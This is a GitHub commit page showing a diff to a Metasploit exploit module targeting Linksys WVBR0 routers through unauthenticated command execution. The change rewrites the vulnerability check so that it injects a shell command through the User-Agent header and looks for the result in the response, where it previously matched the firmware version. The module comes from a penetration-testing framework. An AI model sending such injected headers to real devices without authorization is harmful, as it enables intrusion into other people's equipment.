We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 8c3836c commit b31ac73Copy full SHA for b31ac73
modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb
@@ -48,12 +48,16 @@ def initialize(info = {})
48
end
49
50
def check
51
+ check_str = rand_text_alpha(8)
52
begin
53
res = send_request_raw({
54
'method' => 'GET',
- 'uri' => '/'
55
+ 'uri' => '/',
56
+ 'headers' => {
57
+ 'User-Agent' => "\"; printf \"#{check_str}"
58
+ }
59
})
- if res && res.code == 200 && res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/ # version < 1.0.41
60
+ if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str))
61
return Exploit::CheckCode::Vulnerable
62
63
rescue ::Rex::ConnectionError
0 commit comments